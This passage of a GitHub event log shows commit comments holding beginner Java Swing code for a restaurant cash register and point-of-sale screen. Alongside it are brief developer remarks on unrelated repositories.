jPanel8.setBorder(javax.swing.BorderFactory.createEtchedBorder());\r\n\r\n        btnShrimpPasta.setText(\"Shrimp Pasta\");\r\n        btnShrimpPasta.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnShrimpPastaActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnTomatoBasilLinguine.setText(\"Tomato Basil Linguine\");\r\n        btnTomatoBasilLinguine.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnTomatoBasilLinguineActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnLinguineCarbonara.setText(\"Linguine Carbonara\");\r\n        btnLinguineCarbonara.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnLinguineCarbonaraActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        javax.swing.GroupLayout jPanel8Layout = new javax.swing.GroupLayout(jPanel8);\r\n        jPanel8.setLayout(jPanel8Layout);\r\n        jPanel8Layout.setHorizontalGroup(\r\n            jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel8Layout.createSequentialGroup()\r\n                .addGroup(jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)\r\n                    .addComponent(btnShrimpPasta, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                    .addComponent(btnTomatoBasilLinguine, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, 167, Short.MAX_VALUE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)\r\n                .addComponent(btnLinguineCarbonara, javax.swing.GroupLayout.PREFERRED_SIZE, 168, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n        );\r\n        jPanel8Layout.setVerticalGroup(\r\n            jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel8Layout.createSequentialGroup()\r\n                .addGroup(jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(btnTomatoBasilLinguine, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(btnLinguineCarbonara, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addComponent(btnShrimpPasta, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(40, Short.MAX_VALUE))\r\n        );\r\n\r\n        jPanel9.setBorder(javax.swing.BorderFactory.createEtchedBorder());\r\n\r\n        btnBeer.setText(\"Beer\");\r\n        btnBeer.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnBeerActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnCoke.setText(\"Coke \");\r\n        btnCoke.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnCokeActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnGingerale.setText(\"Ginger Ale\");\r\n        btnGingerale.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnGingeraleActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        javax.swing.GroupLayout jPanel9Layout = new javax.swing.GroupLayout(jPanel9);\r\n        jPanel9.setLayout(jPanel9Layout);\r\n        jPanel9Layout.setHorizontalGroup(\r\n            jPanel9Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel9Layout.createSequentialGroup()\r\n                .addGroup(jPanel9Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)\r\n                    .addComponent(btnBeer, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                    .addComponent(btnCoke, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, 167, Short.MAX_VALUE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)\r\n                .addComponent(btnGingerale, javax.swing.GroupLayout.PREFERRED_SIZE, 168, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n        );\r\n        jPanel9Layout.setVerticalGroup(\r\n            jPanel9Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel9Layout.createSequentialGroup()\r\n                .addGroup(jPanel9Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(btnCoke, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(btnGingerale, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addComponent(btnBeer, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(40, Short.MAX_VALUE))\r\n        );\r\n\r\n        jButton1.setText(\"Go back\");\r\n        jButton1.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                jButton1ActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        javax.swing.GroupLayout jPanel7Layout = new javax.swing.GroupLayout(jPanel7);\r\n        jPanel7.setLayout(jPanel7Layout);\r\n        jPanel7Layout.setHorizontalGroup(\r\n            jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel7Layout.createSequentialGroup()\r\n                .addContainerGap()\r\n                .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n                    .addGroup(jPanel7Layout.createSequentialGroup()\r\n                        .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n                            .addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, 351, Short.MAX_VALUE)\r\n                            .addComponent(jPanel8, javax.swing.GroupLayout.PREFERRED_SIZE, 351, Short.MAX_VALUE)\r\n                            .addComponent(jPanel9, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 351, Short.MAX_VALUE))\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                        .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addGap(71, 71, 71))\r\n                    .addGroup(jPanel7Layout.createSequentialGroup()\r\n                        .addGap(13, 13, 13)\r\n                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 101, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addGap(61, 61, 61)\r\n                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 360, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))))\r\n        );\r\n        jPanel7Layout.setVerticalGroup(\r\n            jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel7Layout.createSequentialGroup()\r\n                .addContainerGap()\r\n                .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(jTextField1, javax.swing.GroupLayout.DEFAULT_SIZE, 42, Short.MAX_VALUE)\r\n                    .addComponent(jButton1))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)\r\n                    .addGroup(jPanel7Layout.createSequentialGroup()\r\n                        .addComponent(jPanel8, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                        .addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                        .addComponent(jPanel9, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                    .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)))\r\n        );\r\n\r\n        jTabbedPane1.addTab(\"Cash Register\", jPanel7);\r\n\r\n        javax.swing.GroupLayout jPanel5Layout = new javax.swing.GroupLayout(jPanel5);\r\n        jPanel5.setLayout(jPanel5Layout);\r\n        jPanel5Layout.setHorizontalGroup(\r\n            jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addComponent(jTabbedPane1)\r\n        );\r\n        jPanel5Layout.setVerticalGroup(\r\n            jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addComponent(jTabbedPane1)\r\n        );\r\n\r\n        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());\r\n        getContentPane().setLayout(layout);\r\n        layout.setHorizontalGroup(\r\n            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addComponent(jPanel5, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n        );\r\n        layout.setVerticalGroup(\r\n            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(layout.createSequentialGroup()\r\n                .addComponent(jPanel5, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                .addContainerGap())\r\n        );\r\n\r\n        pack();\r\n    }// </editor-fold>                        \r\n    \r\n    private void addItem(String food, double price)\r\n    {\r\n        txtBill.setText(txtBill.getText()+\"\\n\"+\" \"+food+PRICE_FORMAT.format(price)+\"\\n\");\r\n        nPreviousPrice = price;\r\n        nTotal +=price;\r\n    }\r\n    \r\n    String spaces(int num)\r\n    {\r\n        String str=\"\";\r\n        for(int i=0; i<num; i++)\r\n            str+=\" \";\r\n        return str;\r\n    }\r\n    \r\n    double getAmount()\r\n    {\r\n        try {\r\n                String strAnswer = JOptionPane.showInputDialog(null, \r\n\t\t\t\t\t\"Please enter the amount paid: \",\r\n                                        \r\n                    \"Amount Paid\", JOptionPane.OK_CANCEL_OPTION);\r\n                String strCusnum = JOptionPane.showInputDialog(null,\r\n                                        \"Please enter the customer number:\",\r\n                    \"Customer number\", JOptionPane.OK_CANCEL_OPTION);\r\n                return Double.parseDouble(strAnswer);\r\n            }\r\n        catch (NumberFormatException e)\r\n        {\r\n            JOptionPane.showMessageDialog(null, \"Please enter a number.\",\r\n                    \"Number Format Exception\", JOptionPane.OK_OPTION);\r\n            return -1;\r\n        }\r\n        catch (NullPointerException e)\r\n        {\r\n            System.out.println(\"Transaction Canceled\");\r\n            return -2;\r\n        }\r\n    }\r\n    \r\n    private void jTextField1ActionPerformed(java.awt.event.ActionEvent evt) {                                            \r\n        // TODO add your handling code here:\r\n    }                                           \r\n\r\n    private void btnTomatoBasilLinguineActionPerformed(java.awt.event.ActionEvent evt) {                                                       \r\n       addItem(\"Tomato Basil Linguine\" + spaces(19),13);\r\n       btnPayment.setEnabled(true);\r\n       btnCancel.setEnabled(true);// TODO add your handling code here:\r\n    }                                                      \r\n\r\n    private void btnCokeActionPerformed(java.awt.event.ActionEvent evt) {                                        \r\n       addItem(\"Coke\" + spaces(52), 2);\r\n       btnPayment.setEnabled(true);\r\n       btnCancel.setEnabled(true);\r\n       repaint(); // TODO add your handling code here:\r\n    }                                       \r\n\r\n    private void btnCapreseSaladActionPerformed(java.awt.event.ActionEvent evt) {                                                \r\n            addItem(\"Caprese Salad\" + spaces(33), 5);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();    // TODO add your handling code here:\r\n    }                                               \r\n\r\n    private void btnGingeraleActionPerformed(java.awt.event.ActionEvent evt) {                                             \r\n            addItem(\"Gingerale\" + spaces(44), 2);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();       // TODO add your handling code here:\r\n    }                                            \r\n      \r\n    private void btnBeerActionPerformed(java.awt.event.ActionEvent evt) {                                        \r\n            addItem(\"Beer\" + spaces(53),3);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();// TODO add your handling code here:\r\n    }                                       \r\n\r\n    private void btnGrilledSalmonSaladActionPerformed(java.awt.event.ActionEvent evt) {                                                      \r\n            addItem(\"Grilled Salmon Salad\" + spaces(22), 5);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();        // TODO add your handling code here:\r\n    }                                                     \r\n\r\n    private void btnNewOrderActionPerformed(java.awt.event.ActionEvent evt) {                                            \r\n            initializeBill();\r\n            repaint();// TODO add your handling code here:\r\n    }                                           \r\n\r\n    private void btnLinguineCarbonaraActionPerformed(java.awt.event.ActionEvent evt) {                                                     \r\n            addItem(\"Linguine Carbonara\" + spaces(24),15);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();    // TODO add your handling code here:\r\n    }                                                    \r\n\r\n    private void btnShrimpPastaActionPerformed(java.awt.event.ActionEvent evt) {                                               \r\n            addItem(\"Shrimp Pasta\" + spaces(35),14);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();// TODO add your handling code here:\r\n    }                                              \r\n\r\n    private void btnCheeseSaladActionPerformed(java.awt.event.ActionEvent evt) {                                               \r\n            addItem(\"Cheese Salad\" + spaces(35), 7);\r\n            btnPayment.setEnabled(true);\r\n            btnCancel.setEnabled(true);\r\n            repaint();// TODO add your handling code here:\r\n    }                                              \r\n\r\n    private void btnPaymentActionPerformed(java.awt.event.ActionEvent evt) {                                           \r\n                nSubTotal = nTotal;\r\n\r\n            txtBill.setText(txtBill.getText() + \"\\n\" +\r\n                \"     \" + \"Total: \" + spaces(41) + PRICE_FORMAT.format(nTotal) + \"\\n\");\r\n\r\n            btnPayment.setEnabled(false);\r\n            btnCancel.setEnabled(false);\r\n            btnTomatoBasilLinguine.setEnabled(false);\r\n            btnLinguineCarbonara.setEnabled(false);\r\n            btnShrimpPasta.setEnabled(false);\r\n            btnCoke.setEnabled(false);\r\n            btnGingerale.setEnabled(false);\r\n\r\n            // get amount paid by client\r\n            double nAnswer = getAmount();\r\n\r\n            // if the cancel button is pressed, reinitialize.\r\n            if (nAnswer == DIALOG_CANCEL)\r\n                initializeBill();\r\n            else\r\n            {\r\n                // while the client gives an insufficent amount, ask again\r\n                while (nAnswer < nSubTotal)\r\n                {\r\n                    if (nAnswer != DIALOG_NOT_NUM)\r\n                        JOptionPane.showMessageDialog(null,\r\n                            \"The amount paid must be at least \" + \r\n\t\t\t\t\t\t\tPRICE_FORMAT.format(nSubTotal),\r\n                            \"Insufficent Amount\", JOptionPane.OK_OPTION);\r\n                    nAnswer = getAmount();\r\n                    if (nAnswer == DIALOG_CANCEL)\r\n                    {\r\n                        initializeBill();\r\n                        return;\r\n                    }\r\n                }\r\n\r\n                txtBill.setText(txtBill.getText() + \"\\n\" +\r\n                    \"     \" + \"Paid: \" + spaces(42) + \r\n\t\t\t\t\tPRICE_FORMAT.format(nAnswer));\r\n                txtBill.setText(txtBill.getText() + \"\\n\" +\r\n                    \"     \" + \"Returned: \" + spaces(33) + \r\n\t\t\t\t\tPRICE_FORMAT.format(nAnswer-nSubTotal));                \r\n            }\r\n            repaint();// TODO add your handling code here:\r\n    }                                          \r\n\r\n    private void btnCancelActionPerformed(java.awt.event.ActionEvent evt) {                                          \r\n        txtBill.setText(txtBill.getText() + \"\\n\" +\r\n               \"     \" + strPreviousDrink + \r\n\t\t\tspaces(40 - strPreviousDrink.length()) + \"-\" +\r\n            PRICE_FORMAT.format(nPreviousPrice) + \"\\n\" +  \"     (Canceled)\\n\");\r\n            nTotal -= nPreviousPrice;\r\n            btnCancel.setEnabled(false);\r\n            repaint();\r\n        }\r\n    \r\n    public static void main(String args[]) {\r\n        try {\r\n            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\r\n                if (\"Nimbus\".equals(info.getName())) {\r\n                    javax.swing.UIManager.setLookAndFeel(info.getClassName());\r\n                    break;\r\n                }\r\n            }\r\n        } catch (ClassNotFoundException ex) {\r\n            java.util.logging.Logger.getLogger(CashRegister.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        } catch (InstantiationException ex) {\r\n            java.util.logging.Logger.getLogger(CashRegister.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        } catch (IllegalAccessException ex) {\r\n            java.util.logging.Logger.getLogger(CashRegister.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        } catch (javax.swing.UnsupportedLookAndFeelException ex) {\r\n            java.util.logging.Logger.getLogger(CashRegister.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\r\n        }\r\n        java.awt.EventQueue.invokeLater(new Runnable() {\r\n            public void run() {\r\n                new CashRegister().setVisible(true);\r\n            }\r\n        });// TODO add your handling code here:\r\n    }                                         \r\n\r\n    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                         \r\n        this.setVisible(false);\r\n        new PointOfSales().setVisible(true);\r\n        this.dispose();// TODO add your handling code here:\r\n    }                                        \r\n    \r\n    \r\n    private final DecimalFormat PRICE_FORMAT = new DecimalFormat(\"$###.##\");\r\n\r\n    // flag, if the user does not enter a number in the dialog\r\n    private final int DIALOG_NOT_NUM = -1;                            \r\n\r\n    // flag, if the user cancels the dialog\r\n\tprivate final int DIALOG_CANCEL = -2;    \r\n    private double nTotal = 0, nSubTotal = 0, nPreviousPrice = 0;\r\n    private String strPreviousDrink;\r\n    // Variables declaration - do not modify                     \r\n    private javax.swing.JButton btnBeer;\r\n    private javax.swing.JButton btnCancel;\r\n    private javax.swing.JButton btnCapreseSalad;\r\n    private javax.swing.JButton btnCheeseSalad;\r\n    private javax.swing.JButton btnCoke;\r\n    private javax.swing.JButton btnGingerale;\r\n    private javax.swing.JButton btnGrilledSalmonSalad;\r\n    private javax.swing.JButton btnLinguineCarbonara;\r\n    private javax.swing.JButton btnNewOrder;\r\n    private javax.swing.JButton btnPayment;\r\n    private javax.swing.JButton btnShrimpPasta;\r\n    private javax.swing.JButton btnTomatoBasilLinguine;\r\n    private javax.swing.JButton jButton1;\r\n    private javax.swing.JPanel jPanel1;\r\n    private javax.swing.JPanel jPanel2;\r\n    private javax.swing.JPanel jPanel5;\r\n    private javax.swing.JPanel jPanel7;\r\n    private javax.swing.JPanel jPanel8;\r\n    private javax.swing.JPanel jPanel9;\r\n    private javax.swing.JScrollPane jScrollPane1;\r\n    private javax.swing.JTabbedPane jTabbedPane1;\r\n    private javax.swing.JTextField jTextField1;\r\n    private javax.swing.JTextArea txtBill;\r\n    // End of variables declaration                   \r\n}\r\n"}},"created_at":"2016-09-05T15:02:21Z"}
{"id":"4517347540","type":"CommitCommentEvent","actor":{"login":"RolfKoenders"},"repo":{"name":"FrankZZ/car-dashboard-aggregator"},"payload":{"comment":{"id":18901328,"position":null,"line":null,"path":null,"commit_id":"bb7d4dfd96049797ce6a79e6bf10a8e099d267ab","created_at":"2016-09-05T15:02:29Z","updated_at":"2016-09-05T15:02:29Z","body":"😂 "}},"created_at":"2016-09-05T15:02:29Z"}
{"id":"4517348321","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18901330,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T15:02:39Z","updated_at":"2016-09-05T15:02:39Z","body":"Could you be more specific about what \"doesn't work\" means becuase I've tried it on the command line with ```mvn javadoc:javadoc```and using ```<pre>{@code```and I got something that looks good to me: https://www.evernote.com/l/AHe8rASFBM9EuozIZsenLdhEhExUSmu_RIw"}},"created_at":"2016-09-05T15:02:39Z"}
{"id":"4517349628","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18901336,"position":5,"line":54,"path":"R/cut.integer.R","commit_id":"c971694cbde0ad0a17498767f0db8f9442e100c4","created_at":"2016-09-05T15:02:57Z","updated_at":"2016-09-05T15:02:57Z","body":"@jonmcalder instead of always rounding, we could create an argument coerce_breaks of `cut.integer` with the options \"round\", \"floor\" or \"ceiling\" with default \"round\". What do you think? Or would that be overkill? "}},"created_at":"2016-09-05T15:02:57Z"}
{"id":"4517351827","type":"CommitCommentEvent","actor":{"login":"Sebbri67"},"repo":{"name":"Sebbri67/Import-Alfresco"},"payload":{"comment":{"id":18901342,"position":null,"line":null,"path":null,"commit_id":"69c707aab365a6aea898ad52f5f620d9eb12dcce","created_at":"2016-09-05T15:03:28Z","updated_at":"2016-09-05T15:03:28Z","body":"Documentation en français"}},"created_at":"2016-09-05T15:03:28Z"}
{"id":"4517352734","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901344,"position":null,"line":null,"path":null,"commit_id":"d0d409fcb7d2d5a77998693c6698e3704e833853","created_at":"2016-09-05T15:03:39Z","updated_at":"2016-09-05T15:03:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SKmJv7Z4QHi6r2wMFSjmsQ"}},"created_at":"2016-09-05T15:03:39Z"}
{"id":"4517353002","type":"CommitCommentEvent","actor":{"login":"rrrrrrrina"},"repo":{"name":"Crusader197/SigmaProject"},"payload":{"comment":{"id":18901347,"position":null,"line":null,"path":null,"commit_id":"a32da5aef0b066d721ca88264a79c088b5408567","created_at":"2016-09-05T15:03:42Z","updated_at":"2016-09-05T15:03:42Z","body":"\r\npackage point.of.sales;\r\n\r\n\r\npublic class PointOfSales extends javax.swing.JFrame {\r\n\r\n    /** Creates new form tablearray */\r\n    public PointOfSales() {\r\n        initComponents();\r\n    }\r\n\r\n    private void initComponents() {\r\n\r\n        jPanel5 = new javax.swing.JPanel();\r\n        jTabbedPane1 = new javax.swing.JTabbedPane();\r\n        jPanel6 = new javax.swing.JPanel();\r\n        jPanel3 = new javax.swing.JPanel();\r\n        jButton1 = new javax.swing.JButton();\r\n        jButton2 = new javax.swing.JButton();\r\n        jButton3 = new javax.swing.JButton();\r\n        jButton4 = new javax.swing.JButton();\r\n        jButton5 = new javax.swing.JButton();\r\n        jButton6 = new javax.swing.JButton();\r\n        jPanel4 = new javax.swing.JPanel();\r\n        jButton19 = new javax.swing.JButton();\r\n        jButton20 = new javax.swing.JButton();\r\n        jButton21 = new javax.swing.JButton();\r\n        jButton22 = new javax.swing.JButton();\r\n        jPanel10 = new javax.swing.JPanel();\r\n        jButton7 = new javax.swing.JButton();\r\n        jButton8 = new javax.swing.JButton();\r\n        jButton9 = new javax.swing.JButton();\r\n\r\n        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\r\n\r\n        jButton1.setText(\"T3\");\r\n        jButton1.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                jButton1ActionPerformed(evt);\r\n            }\r\n        });\r\n        \r\n\r\n        jButton2.setText(\"T1\");\r\n        jButton3.setText(\"T5\");\r\n        jButton4.setText(\"T4\");\r\n\r\n        jButton5.setText(\"T2\");\r\n\r\n        jButton6.setText(\"T6\");\r\n\r\n        javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);\r\n        jPanel3.setLayout(jPanel3Layout);\r\n        jPanel3Layout.setHorizontalGroup(\r\n            jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel3Layout.createSequentialGroup()\r\n                .addGap(40, 40, 40)\r\n                .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)\r\n                    .addGroup(jPanel3Layout.createSequentialGroup()\r\n                        .addComponent(jButton2, javax.swing.GroupLayout.PREFERRED_SIZE, 96, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, 56, Short.MAX_VALUE)\r\n                        .addComponent(jButton5, javax.swing.GroupLayout.PREFERRED_SIZE, 96, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                    .addGroup(jPanel3Layout.createSequentialGroup()\r\n                        .addComponent(jButton4, javax.swing.GroupLayout.PREFERRED_SIZE, 96, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                        .addComponent(jButton3, javax.swing.GroupLayout.PREFERRED_SIZE, 96, javax.swing.GroupLayout.PREFERRED_SIZE)))\r\n                .addGap(64, 64, 64)\r\n                .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n                    .addComponent(jButton6, javax.swing.GroupLayout.PREFERRED_SIZE, 96, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 96, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addGap(37, 37, 37))\r\n        );\r\n        jPanel3Layout.setVerticalGroup(\r\n            jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel3Layout.createSequentialGroup()\r\n                .addGap(48, 48, 48)\r\n                .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(jButton5, javax.swing.GroupLayout.PREFERRED_SIZE, 75, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 75, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(jButton2, javax.swing.GroupLayout.PREFERRED_SIZE, 75, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(jButton4, javax.swing.GroupLayout.PREFERRED_SIZE, 75, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(jButton3, javax.swing.GroupLayout.PREFERRED_SIZE, 75, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(jButton6, javax.swing.GroupLayout.PREFERRED_SIZE, 75, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addGap(47, 47, 47))\r\n        );\r\n\r\n        jButton19.setText(\"B1\");\r\n        jButton20.setText(\"B2\");\r\n        jButton21.setText(\"B3\");\r\n\r\n        jButton22.setText(\"B4\");\r\n\r\n        javax.swing.GroupLayout jPanel4Layout = new javax.swing.GroupLayout(jPanel4);\r\n        jPanel4.setLayout(jPanel4Layout);\r\n        jPanel4Layout.setHorizontalGroup(\r\n            jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel4Layout.createSequentialGroup()\r\n                .addGap(46, 46, 46)\r\n                .addComponent(jButton19, javax.swing.GroupLayout.PREFERRED_SIZE, 61, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addComponent(jButton20, javax.swing.GroupLayout.PREFERRED_SIZE, 57, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addComponent(jButton21, javax.swing.GroupLayout.PREFERRED_SIZE, 57, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addComponent(jButton22, javax.swing.GroupLayout.PREFERRED_SIZE, 57, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                